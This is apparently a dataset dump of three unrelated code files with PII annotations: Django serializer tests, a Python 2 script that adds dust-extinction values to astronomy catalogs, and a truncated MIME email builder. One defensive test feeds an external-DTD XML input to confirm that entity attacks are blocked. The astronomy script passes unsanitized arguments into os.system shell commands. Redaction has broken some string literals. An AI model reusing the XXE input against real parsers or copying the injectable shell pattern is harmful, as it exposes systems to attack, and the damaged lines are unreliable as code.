testcase.assertEqual(data['right'], instance.right_id) + if 'extra' in data: + testcase.assertEqual(data['extra'], instance.extra) + else: + testcase.assertEqual(""doesn't matter"", instance.extra) + +def o2o_compare(testcase, pk, klass, data): + instance = klass.objects.get(data=data) + testcase.assertEqual(data, instance.data_id) + +def pk_compare(testcase, pk, klass, data): + instance = klass.objects.get(data=data) + testcase.assertEqual(data, instance.data) + +def inherited_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + for key,value in data.items(): + testcase.assertEqual(value, getattr(instance,key)) + +# Define some data types. Each data type is +# actually a pair of functions; one to create +# and one to compare objects of that type +data_obj = (data_create, data_compare) +generic_obj = (generic_create, generic_compare) +fk_obj = (fk_create, fk_compare) +m2m_obj = (m2m_create, m2m_compare) +im2m_obj = (im2m_create, im2m_compare) +im_obj = (im_create, im_compare) +o2o_obj = (o2o_create, o2o_compare) +pk_obj = (pk_create, pk_compare) +inherited_obj = (inherited_create, inherited_compare) + +test_data = [ + # Format: (data type, PK value, Model Class, data) + (data_obj, 1, BinaryData, six.memoryview(b""\x05\xFD\x00"")), + (data_obj, 2, BinaryData, None), + (data_obj, 5, BooleanData, True), + (data_obj, 6, BooleanData, False), + (data_obj, 10, CharData, ""Test Char Data""), + (data_obj, 11, CharData, """"), + (data_obj, 12, CharData, ""None""), + (data_obj, 13, CharData, ""null""), + (data_obj, 14, CharData, ""NULL""), + (data_obj, 15, CharData, None), + # (We use something that will fit into a latin1 database encoding here, + # because that is still the default used on many system setups.) 
+ (data_obj, 16, CharData, '\xa5'), + (data_obj, 20, DateData, datetime.date(2006,6,16)), + (data_obj, 21, DateData, None), + (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)), + (data_obj, 31, DateTimeData, None), + (data_obj, 40, EmailData, dummy@email.com""), + (data_obj, 41, EmailData, None), + (data_obj, 42, EmailData, """"), + (data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'), +# (data_obj, 51, FileData, None), + (data_obj, 52, FileData, """"), + (data_obj, 60, FilePathData, ""/foo/bar/whiz.txt""), + (data_obj, 61, FilePathData, None), + (data_obj, 62, FilePathData, """"), + (data_obj, 70, DecimalData, decimal.Decimal('12.345')), + (data_obj, 71, DecimalData, decimal.Decimal('-12.345')), + (data_obj, 72, DecimalData, decimal.Decimal('0.0')), + (data_obj, 73, DecimalData, None), + (data_obj, 74, FloatData, 12.345), + (data_obj, 75, FloatData, -12.345), + (data_obj, 76, FloatData, 0.0), + (data_obj, 77, FloatData, None), + (data_obj, 80, IntegerData, 123456789), + (data_obj, 81, IntegerData, -123456789), + (data_obj, 82, IntegerData, 0), + (data_obj, 83, IntegerData, None), + #(XX, ImageData + (data_obj, 90, IPAddressData, ""127.0.0.1""), + (data_obj, 91, IPAddressData, None), + (data_obj, 95, GenericIPAddressData, ""127.0.0.1""), + (data_obj, 96, GenericIPAddressData, None), + (data_obj, 100, NullBooleanData, True), + (data_obj, 101, NullBooleanData, False), + (data_obj, 102, NullBooleanData, None), + (data_obj, 120, PositiveIntegerData, 123456789), + (data_obj, 121, PositiveIntegerData, None), + (data_obj, 130, PositiveSmallIntegerData, 12), + (data_obj, 131, PositiveSmallIntegerData, None), + (data_obj, 140, SlugData, ""this-is-a-slug""), + (data_obj, 141, SlugData, None), + (data_obj, 142, SlugData, """"), + (data_obj, 150, SmallData, 12), + (data_obj, 151, SmallData, -12), + (data_obj, 152, SmallData, 0), + (data_obj, 153, SmallData, None), + (data_obj, 160, TextData, """"""This is a long piece of text. +It contains line breaks. +Several of them. 
+The end.""""""), + (data_obj, 161, TextData, """"), + (data_obj, 162, TextData, None), + (data_obj, 170, TimeData, datetime.time(10,42,37)), + (data_obj, 171, TimeData, None), + + (generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']), + (generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']), + + (data_obj, 300, Anchor, ""Anchor 1""), + (data_obj, 301, Anchor, ""Anchor 2""), + (data_obj, 302, UniqueAnchor, ""UAnchor 1""), + + (fk_obj, 400, FKData, 300), # Post reference + (fk_obj, 401, FKData, 500), # Pre reference + (fk_obj, 402, FKData, None), # Empty reference + + (m2m_obj, 410, M2MData, []), # Empty set + (m2m_obj, 411, M2MData, [300,301]), # Post reference + (m2m_obj, 412, M2MData, [500,501]), # Pre reference + (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference + + (o2o_obj, None, O2OData, 300), # Post reference + (o2o_obj, None, O2OData, 500), # Pre reference + + (fk_obj, 430, FKSelfData, 431), # Pre reference + (fk_obj, 431, FKSelfData, 430), # Post reference + (fk_obj, 432, FKSelfData, None), # Empty reference + + (m2m_obj, 440, M2MSelfData, []), + (m2m_obj, 441, M2MSelfData, []), + (m2m_obj, 442, M2MSelfData, [440, 441]), + (m2m_obj, 443, M2MSelfData, [445, 446]), + (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]), + (m2m_obj, 445, M2MSelfData, []), + (m2m_obj, 446, M2MSelfData, []), + + (fk_obj, 450, FKDataToField, ""UAnchor 1""), + (fk_obj, 451, FKDataToField, ""UAnchor 2""), + (fk_obj, 452, FKDataToField, None), + + (fk_obj, 460, FKDataToO2O, 300), + + (im2m_obj, 470, M2MIntermediateData, None), + + # testing post- and pre-references and extra fields + (im_obj, 480, Intermediate, {'right': 300, 'left': 470}), + (im_obj, 481, Intermediate, {'right': 300, 'left': 490}), + (im_obj, 482, Intermediate, {'right': 500, 'left': 470}), + (im_obj, 483, Intermediate, {'right': 500, 'left': 490}), + (im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': ""extra""}), + (im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': ""extra""}), + (im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': ""extra""}), + (im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': ""extra""}), + + (im2m_obj, 490, M2MIntermediateData, []), + + (data_obj, 500, Anchor, ""Anchor 3""), + (data_obj, 501, Anchor, ""Anchor 4""), + (data_obj, 502, UniqueAnchor, ""UAnchor 2""), + + (pk_obj, 601, BooleanPKData, True), + (pk_obj, 602, BooleanPKData, False), + (pk_obj, 610, CharPKData, ""Test Char PKData""), +# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)), +# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)), + (pk_obj, 640, EmailPKData, ""dummy@email.com""), +# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'), + (pk_obj, 660, FilePathPKData, ""/foo/bar/whiz.txt""), + (pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')), + (pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')), + (pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')), + (pk_obj, 673, FloatPKData, 12.345), + (pk_obj, 674, FloatPKData, -12.345), + (pk_obj, 675, FloatPKData, 0.0), + (pk_obj, 680, IntegerPKData, 123456789), + (pk_obj, 681, IntegerPKData, -123456789), + (pk_obj, 682, IntegerPKData, 0), +# (XX, ImagePKData + (pk_obj, 690, IPAddressPKData, ""127.0.0.1""), + (pk_obj, 695, GenericIPAddressPKData, ""127.0.0.1""), + # (pk_obj, 700, NullBooleanPKData, True), + # (pk_obj, 701, NullBooleanPKData, False), + (pk_obj, 720, PositiveIntegerPKData, 123456789), + (pk_obj, 730, PositiveSmallIntegerPKData, 12), + (pk_obj, 740, SlugPKData, ""this-is-a-slug""), + (pk_obj, 750, SmallPKData, 12), + (pk_obj, 751, SmallPKData, -12), + (pk_obj, 752, SmallPKData, 0), +# (pk_obj, 760, TextPKData, """"""This is a long piece of text. +# It contains line breaks. +# Several of them. +# The end.""""""), +# (pk_obj, 770, TimePKData, datetime.time(10,42,37)), +# (pk_obj, 790, XMLPKData, """"), + + (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)), + (data_obj, 810, ModifyingSaveData, 42), + + (inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}), + (inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}), + (inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}), + + (data_obj, 1000, BigIntegerData, 9223372036854775807), + (data_obj, 1001, BigIntegerData, -9223372036854775808), + (data_obj, 1002, BigIntegerData, 0), + (data_obj, 1003, BigIntegerData, None), + (data_obj, 1004, LengthModel, 0), + (data_obj, 1005, LengthModel, 1), +] + +natural_key_test_data = [ + (data_obj, 1100, NaturalKeyAnchor, ""Natural Key Anchor""), + (fk_obj, 1101, FKDataNaturalKey, 1100), + (fk_obj, 1102, FKDataNaturalKey, None), +] + +# Because Oracle treats the empty string as NULL, Oracle is expected to fail +# when field.empty_strings_allowed is True and the value is None; skip these +# tests. +if connection.features.interprets_empty_strings_as_nulls: + test_data = [data for data in test_data + if not (data[0] == data_obj and + data[2]._meta.get_field('data').empty_strings_allowed and + data[3] is None)] + +# Regression test for #8651 -- an FK to an object with PK of 0. +# This won't work on MySQL since it won't let you create an object +# with a primary key of 0. +if connection.features.allows_primary_key_0: + test_data.extend([ + (data_obj, 0, Anchor, ""Anchor 0""), + (fk_obj, 465, FKData, 0), + ]) + +# Dynamically create serializer tests to ensure that all +# registered serializers are automatically tested. 
+class SerializerTests(TestCase): + def test_get_unknown_serializer(self): + """""" + #15889: get_serializer('nonsense') raises a SerializerDoesNotExist + """""" + with self.assertRaises(SerializerDoesNotExist): + serializers.get_serializer(""nonsense"") + + with self.assertRaises(KeyError): + serializers.get_serializer(""nonsense"") + + # SerializerDoesNotExist is instantiated with the nonexistent format + with self.assertRaises(SerializerDoesNotExist) as cm: + serializers.get_serializer(""nonsense"") + self.assertEqual(cm.exception.args, (""nonsense"",)) + + def test_unregister_unknown_serializer(self): + with self.assertRaises(SerializerDoesNotExist): + serializers.unregister_serializer(""nonsense"") + + def test_get_unknown_deserializer(self): + with self.assertRaises(SerializerDoesNotExist): + serializers.get_deserializer(""nonsense"") + + def test_json_deserializer_exception(self): + with self.assertRaises(DeserializationError): + for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""): + pass + + @skipUnless(yaml, ""PyYAML not installed"") + def test_yaml_deserializer_exception(self): + with self.assertRaises(DeserializationError): + for obj in serializers.deserialize(""yaml"", ""{""): + pass + + def test_serialize_proxy_model(self): + BaseModel.objects.create(parent_data=1) + base_objects = BaseModel.objects.all() + proxy_objects = ProxyBaseModel.objects.all() + proxy_proxy_objects = ProxyProxyBaseModel.objects.all() + base_data = serializers.serialize(""json"", base_objects) + proxy_data = serializers.serialize(""json"", proxy_objects) + proxy_proxy_data = serializers.serialize(""json"", proxy_proxy_objects) + self.assertEqual(base_data, proxy_data.replace('proxy', '')) + self.assertEqual(base_data, proxy_proxy_data.replace('proxy', '')) + + +def serializerTest(format, self): + + # Create all the objects defined in the test data + objects = [] + instance_count = {} + for (func, pk, klass, datum) in test_data: + with connection.constraint_checks_disabled(): + objects.extend(func[0](pk, klass, datum)) + instance_count[klass] = 0 # register every model class used, so the count check below is not vacuous + + # Get a count of the number of objects created for each class + for klass in instance_count: + instance_count[klass] = klass.objects.count() + + # Add the generic tagged objects to the object list + objects.extend(Tag.objects.all()) + + # Serialize the test database + serialized_data = serializers.serialize(format, objects, indent=2) + + for obj in serializers.deserialize(format, serialized_data): + obj.save() + + # Assert that the deserialized data is the same + # as the original source + for (func, pk, klass, datum) in test_data: + func[1](self, pk, klass, datum) + + # Assert that the number of objects deserialized is the + # same as the number that was serialized. + for klass, count in instance_count.items(): + self.assertEqual(count, klass.objects.count()) + +if connection.vendor == 'mysql' and six.PY3: + # Existing MySQL DB-API drivers fail on binary data. 
+ serializerTest = expectedFailure(serializerTest) + + +def naturalKeySerializerTest(format, self): + # Create all the objects defined in the test data + objects = [] + instance_count = {} + for (func, pk, klass, datum) in natural_key_test_data: + with connection.constraint_checks_disabled(): + objects.extend(func[0](pk, klass, datum)) + instance_count[klass] = 0 # same bookkeeping as serializerTest above + + # Get a count of the number of objects created for each class + for klass in instance_count: + instance_count[klass] = klass.objects.count() + + # Serialize the test database + serialized_data = serializers.serialize(format, objects, indent=2, + use_natural_keys=True) + + for obj in serializers.deserialize(format, serialized_data): + obj.save() + + # Assert that the deserialized data is the same + # as the original source + for (func, pk, klass, datum) in natural_key_test_data: + func[1](self, pk, klass, datum) + + # Assert that the number of objects deserialized is the + # same as the number that was serialized. + for klass, count in instance_count.items(): + self.assertEqual(count, klass.objects.count()) + +def fieldsTest(format, self): + obj = ComplexModel(field1='first', field2='second', field3='third') + obj.save_base(raw=True) + + # Serialize then deserialize the test database + serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3')) + result = next(serializers.deserialize(format, serialized_data)) + + # Check that the deserialized object contains data in only the serialized fields. + self.assertEqual(result.object.field1, 'first') + self.assertEqual(result.object.field2, '') + self.assertEqual(result.object.field3, 'third') + +def streamTest(format, self): + obj = ComplexModel(field1='first',field2='second',field3='third') + obj.save_base(raw=True) + + # Serialize the test database to a stream + for stream in (six.StringIO(), HttpResponse()): + serializers.serialize(format, [obj], indent=2, stream=stream) + + # Serialize normally for a comparison + string_data = serializers.serialize(format, [obj], indent=2) + + # Check that the two are the same + if isinstance(stream, six.StringIO): + self.assertEqual(string_data, stream.getvalue()) + else: + self.assertEqual(string_data, stream.content.decode('utf-8')) + +for format in serializers.get_serializer_formats(): + setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format)) + setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format)) + setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format)) + if format != 'python': + setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format)) + + +class XmlDeserializerSecurityTests(TestCase): + + def test_no_dtd(self): + """""" + The XML deserializer shouldn't allow a DTD. + + This is the most straightforward way to prevent all entity definitions + and avoid both external entities and entity-expansion attacks. 
+ + """""" + xml = '<?xml version=""1.0"" standalone=""no""?><!DOCTYPE example SYSTEM ""http://example.com/example.dtd""><root/>' + with self.assertRaises(DTDForbidden): + next(serializers.deserialize('xml', xml)) +",21669,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['NRP', 'django.core'], ['PERSON', 'DTDForbidden'], ['LOCATION', 'DecimalData'], ['LOCATION', 'FKData'], ['LOCATION', 'ProxyBaseModel'], ['PERSON', ""data['right""], ['NRP', ""data['extra""], ['PERSON', 'type(instance.data'], ['PERSON', 'type(instance.data'], ['LOCATION', 'generic_compare(testcase'], ['LOCATION', 'fk_compare(testcase'], ['LOCATION', 'o2o_compare(testcase'], ['LOCATION', 'pk_compare(testcase'], ['PERSON', 'm2m_obj'], ['LOCATION', 'inherited_obj'], ['PERSON', '\\xa5'], ['DATE_TIME', '20'], ['DATE_TIME', '21'], ['DATE_TIME', '30'], ['DATE_TIME', '31'], ['DATE_TIME', '40'], ['DATE_TIME', '41'], ['DATE_TIME', '42'], ['DATE_TIME', '50'], ['DATE_TIME', '51'], ['DATE_TIME', '52'], ['DATE_TIME', '60'], ['DATE_TIME', '61'], ['DATE_TIME', '62'], ['DATE_TIME', '70'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '71'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '72'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '73'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '74'], ['DATE_TIME', '75'], ['DATE_TIME', '76'], ['DATE_TIME', '77'], ['DATE_TIME', '80'], ['DATE_TIME', '123456789'], ['DATE_TIME', '81'], ['DATE_TIME', '82'], ['DATE_TIME', '83'], ['DATE_TIME', '90'], ['DATE_TIME', '91'], ['DATE_TIME', '95'], ['DATE_TIME', '96'], ['DATE_TIME', '101'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['PERSON', 'tag3'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '410'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '440'], ['LOCATION', 'm2m_obj'], ['LOCATION', '441'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '443'], ['LOCATION', 'm2m_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['DATE_TIME', '123456789'], ['LOCATION', '751'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['DATE_TIME', '1100'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['PERSON', ""next(serializers.deserialize('xml""], ['URL', 'http://example.com/example.dtd""'], ['URL', 'django.co'], ['URL', 'django.core.se'], ['URL', 'django.core.serializers.ba'], ['URL', 'django.core.se'], ['URL', 'django.ht'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'instance.tags.cr'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'meta.parents.it'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'obj.id'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 
'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'data.it'], ['URL', 'testcase.as'], ['URL', 'six.me'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'connection.features.int'], ['URL', 'meta.ge'], ['URL', 'connection.features.al'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'cm.exception.ar'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'BaseModel.objects.cr'], ['URL', 'BaseModel.objects.al'], ['URL', 'ProxyBaseModel.objects.al'], ['URL', 'ProxyProxyBaseModel.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'Tag.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'connection.ve'], ['URL', 'six.PY'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'obj.sa'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'obj.sa'], ['URL', 'six.St'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'six.St'], ['URL', 'self.as'], ['URL', 'stream.ge'], ['URL', 'self.as'], ['URL', 'stream.content.de'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de']]" +43,"import threading + +def ebv_list(list_submit,list_dict,i,ppid): + import os + lineindex = 0 + timehold = time.time() + list_out = [] + + out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w') + for line in list_submit: + tt = re.split('\s+',line) + ra = float(tt[0]) + dec = float(tt[1]) + EBV = calc_EBV(float(ra),float(dec),i) + list_out.append(EBV) + #print EBV + lineindex += 1 + out.write(str(EBV) + '\n') + if lineindex % 100 == 0: + print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold + timehold = time.time() + list_dict[str(i)]['list_out'] = list_out + out.close() + +def calc_EBV(coord_in_ra,coord_in_dec,i): + + #coord_in_ra='12:51:26.28' + #coord_in_dec='27:07:42.' + coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING + g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude + + spt = re.split('\:',str(g.lat)) + #print spt, abs(float(spt[0])), float(spt[1])/60. + gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. ) + #print gallat + #print g.long + spt = re.split('\:',str(g.long)) + #print spt + gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. 
) + #print gallong + + #coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000') + + output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) ) + spt = re.split('\s',output) + #print spt + EBV = spt[-1] + #print EBV, float(coord_in_ra), float(coord_in_dec) + return EBV + +class MyThread ( threading.Thread ): + def __init__ ( self, list_submit,list_dict, i, ppid): + self.i = i + self.list_submit = list_submit + self.list_dict = list_dict + self.ppid = ppid + threading.Thread.__init__(self) + + def run ( self ): + ebv_list(self.list_submit,list_dict,self.i,self.ppid) + return + +#add E(B-V) to ldac table +import re, commands, sys, bashreader, os +from ephem import * + +dict = bashreader.parseFile('progs.ini') + +table = sys.argv[1] + +import time +tempfile = '/tmp/outkey' +ebvfile = '/tmp/outebv' +os.system('rm ' + ebvfile) +ppid = os.getppid() +print ppid +command = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile +print command +os.system(command) +list = [] +import re +outkey=open(tempfile,'w') +lines = open(ebvfile,'r').readlines() +number_interval = 4 +length_int = len(lines)/number_interval +start = 0 +my_threads = [] +list_dict = {} +for i in range(number_interval): + end = start + length_int + if i + 1 == number_interval: + list_submit = lines[start:] + else: + list_submit = lines[start:end] + start = end + list_dict[str(i)] = {'list_submit':list_submit} + #s = MyThread(list_submit,list_dict,i,ppid) + + #stat = os.fork() + print i, 'started' + s = os.fork() + if not s: + ebv_list(list_submit,list_dict,i,ppid) + sys.exit() + #s.start() + my_threads.append(s) + +print my_threads +#print threading.enumerate() +for s in my_threads: + os.waitpid(s,0) + +print 'done' + +list_out = [] +for i in range(number_interval): + list_out = list_out + list_dict[str(i)]['list_out'] + +print len(lines), len(list_out) +print lines[0:2], list_out[0:2] + + + + + +# READ IN COLUMN INFO + + + + + + + + + + + +for val in list_out: + outkey.write(str(val) + '\n') + + +outkey.close() + +command = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict['photconf'] + ""/EBV.conf -t OBJECTS "" +os.system(command) + +command = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV"" +os.system(command) + +",3755,"[['PERSON', 'timehold'], ['PERSON', 'ra = float(tt[0'], ['PERSON', 'timehold'], ['LOCATION', 'Equatorial'], ['PERSON', 'gallat'], ['PERSON', 'gallong = float(spt[0'], ['PERSON', 'MyThread'], ['PERSON', 'self.list_dict = list_dict'], ['LOCATION', 'self.i'], ['URL', 'out.cl'], ['URL', 'g.la'], ['URL', 'g.la'], ['URL', 'commands.ge'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'bashreader.pa'], ['URL', 'progs.in'], ['URL', 'sys.ar'], ['URL', 'os.sy'], ['URL', 'os.ge'], ['URL', 'os.sy'], ['URL', 'os.fo'], ['URL', 'os.fo'], ['URL', 's.st'], ['URL', 'outkey.cl'], ['URL', 'EBV.co'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +44,"#coding=utf-8 + +import smtplib +from datetime import datetime +from hashlib import md5 +import sys, re +from .misc import * +from .parts import * + +from collections import OrderedDict as odict + +class Mimemail(): + + def __init__(self, **kwargs): + self.headers = odict() + self.headers['MIME-Version'] = '1.0' + self.headers['From'] = MM_DEFAULT_FROM + self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT') + + self.body = '' + self.html = 
None + self.text = None + self.images = [] + self.attachments = [] + self.charset = 'UTF-8' + self.recipients = {} + self.from_email = 'root@localhost' + self.kw = kwargs + + def set_from(self, from_email, from_name): + self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email) + self.from_email = from_email + + def set_html(self, html): + self.html = html + + def set_text(self, text): + self.text = text + + def add_image(self, image): + self.images.append(image) + + def add_attachment(self, att): + self.attachments.append(att) + + def set_subject(self, subject): + self.subject = subject + + def create_images_part(self, boundary): + lines = [] + for image in self.images: + lines.extend([ + MM_DEFAULT_CRLF, + '--%s%s' % (boundary, MM_DEFAULT_CRLF), + image.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + image.get_part_body() + ]) + + return ''.join(lines) + + def create_attachments_part(self, boundary): + lines = [] + for att in self.attachments: + lines.extend([ + MM_DEFAULT_CRLF, + '--%s%s' % (boundary, MM_DEFAULT_CRLF), + att.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + att.get_part_body() + ]) + + return ''.join(lines) + + def build(self): + has_html = self.html != None + has_text = self.text != None + has_img = len(self.images) > 0 + has_att = len(self.attachments) > 0 + + if has_text and not has_html: + self.html = MimemailPartHtml(re.sub(r'\n', '
    ', self.text.plain_content, re.M | re.S), charset = self.charset) + elif has_html and not has_text: + self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, re.M | re.S | re.U), charset = self.charset) + elif not has_html and not has_text and not has_att: + raise MimemailException('An email has no content to send') + + if has_img: + for image in self.images: + src = image.get_file_path() + dst = 'cid:' + image.get_image_cid() + self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst) + + boundary = 'alt_' + gen_boundary_hash() + self.headers['Content-Type'] = 'multipart/alternative; boundary=""' + boundary + '""' + + self.body = ''.join([ + '--%s%s' % ( boundary, MM_DEFAULT_CRLF ), + self.text.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + self.text.get_part_body(), + '%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ), + self.html.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + self.html.get_part_body(), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + + if has_img: + boundary = 'rel_' + gen_boundary_hash() + self.body = ''.join([ + '--%s%s' % ( boundary, MM_DEFAULT_CRLF ), + 'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF), + self.body, + self.create_images_part(boundary), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + self.headers['Content-Type'] = 'multipart/related; boundary=""%s""' % (boundary) + + if has_att: + boundary = 'att_' + gen_boundary_hash() + self.body = ''.join([ + '--%s%s' % (boundary, MM_DEFAULT_CRLF ), + 'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF), + self.body, + self.create_attachments_part(boundary), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + self.headers['Content-Type'] = 'multipart/mixed; boundary=""%s""' % (boundary) + + self.headers['Message-ID'] = self.gen_message_id() + + if hasattr(self, 'subject'): + self.headers['Subject'] = encode_header(self.subject, self.charset) + + def gen_message_id(self): + return '<%s.%08x@%s>' % (datetime.datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost')) + + def add_recipient(self, email, name = None): + self.recipients[email] = name if name else email + + def send(self): + self.build() + + extra_headers = self.get_extra_headers() + + for email, name in self.recipients.iteritems(): + message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body) + s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1')) + s.sendmail(self.from_email, email, message) + s.quit() + + def get_extra_headers(self): + return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for 